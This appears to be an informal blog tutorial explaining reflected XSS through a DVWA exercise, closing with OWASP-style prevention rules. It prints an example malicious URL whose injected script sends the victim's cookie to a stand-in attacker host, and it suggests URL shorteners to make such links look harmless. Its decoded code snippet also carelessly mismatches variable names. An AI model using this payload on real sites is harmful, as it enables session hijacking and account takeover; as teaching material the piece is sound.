Why a user-controlled pop-up is vulnerable?
Have you ever encountered the question, that why a simple pop-up^, that could be controlled by a user, makes an application vulnerable? What is the real fuss about a mere pop-up? Indeed it’s just a pop-up, what harm it can do? We, of course, encounter several pop-ups while browsing a website, what difference does it make, if it could be controlled by you, right? What exactly is the real logic behind this scenario?
The above image shows a simple popup saying “test”, that was created while testing the DVWA. Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable and available for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment. This was an exercise in DVWA- XSS reflected. You can further explore the DVWA Web Application for other web-based vulnerabilities, by installing it for the GitHub repository- digininja/DVWA.
In this article, we’ll be discussing the real, nitty-gritty behind the question: Why a user-controlled pop-up is vulnerable?
Code looked like something: <script>alert(“test”)</script>
Conclusion: the browser is an idiot, he will go ahead and look for your domain name in the request. If he founds that, you, the master, are ordering him to do a task. Yes, he’ll just do it. ✔
So, as said, the website is vulnerable to XSS, rather a Reflected XSS, also known as First Order XSS (say, a user-controlled pop-up, okay I give up, no more nomenclature now), the attacker can make a malicious request like*:
Evil Code: “https://yourweb.com/somepage.ex?vulnerbleparameter=<script>var+x=new+Image;+x.src="https://attackerweb.com/"%2bdocument.cookie;</script>"
Did you notice what I just did there? Let me explain, the actions taken are-
- redirection to the attacker’s website: “https://attackerweb.com/"
- theft of cookie generated by your website
- and lastly, grief for your pity soul, your session is mine.
Code decoded: var x= new Image; i.src=”https://attackerweb.com/"+document.cookie;
You can understand the above-decoded part right? So, further, a stolen cookie could be used to authenticate a session on your website that can grant the attacker full access to your account over the website.
- Note: Action Required- a logged-in victim (here, you) needs to be tricked, to click the malicious link, which is a no bar, as you (I don’t trust anyone) easily trust unknown URLs. Moreover, the request seems legit, as it is originated from a trusted website (https://yourwebsite.com/). Also, URL shorteners, like Bit.ly, free Url Shortener, etc could be used to make the link appealing.
^What actually is a pop-up?
So, now, the Remediation-
What can you do?
- Firstly, do not fall for social engineering gimmicks. Do not click the unknown URL/images/kitty faces/yes, all the other unknowns (I repeat do not or what just leave it, go ahead, I’m no one to speak for you, well its all yours).
- If you really have to check your account, go to the original website, authenticate & make the required changes. Yeah, you heard me. Always validate, look where you are going. In case of code red, try ctrl + z, abort the task (and pray it works)
- On a serious note, to prevent XSS in your website, follow below rules:
- Never Insert Untrusted Data Except in Allowed Locations
- HTML Encode Before Inserting Untrusted Data into HTML Element Content
- Attribute Encode Before Inserting Untrusted Data into HTML Common Attributes
- CSS Encode And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values
- URL Encode Before Inserting Untrusted Data into HTML URL Parameter Values
- Sanitize HTML Markup with a Library Designed for the Job
- Properly use modern JS frameworks
- Implement- X-XSS-Protection Header
For more info, don’t forget to refer to: OWASP XSS CheatSheet.
I know what you are thinking, an unknown link at the end of the post. No, I’m not doing any gimmicks on you. You can trust me (or not, evil laughs). Did you get that? 👾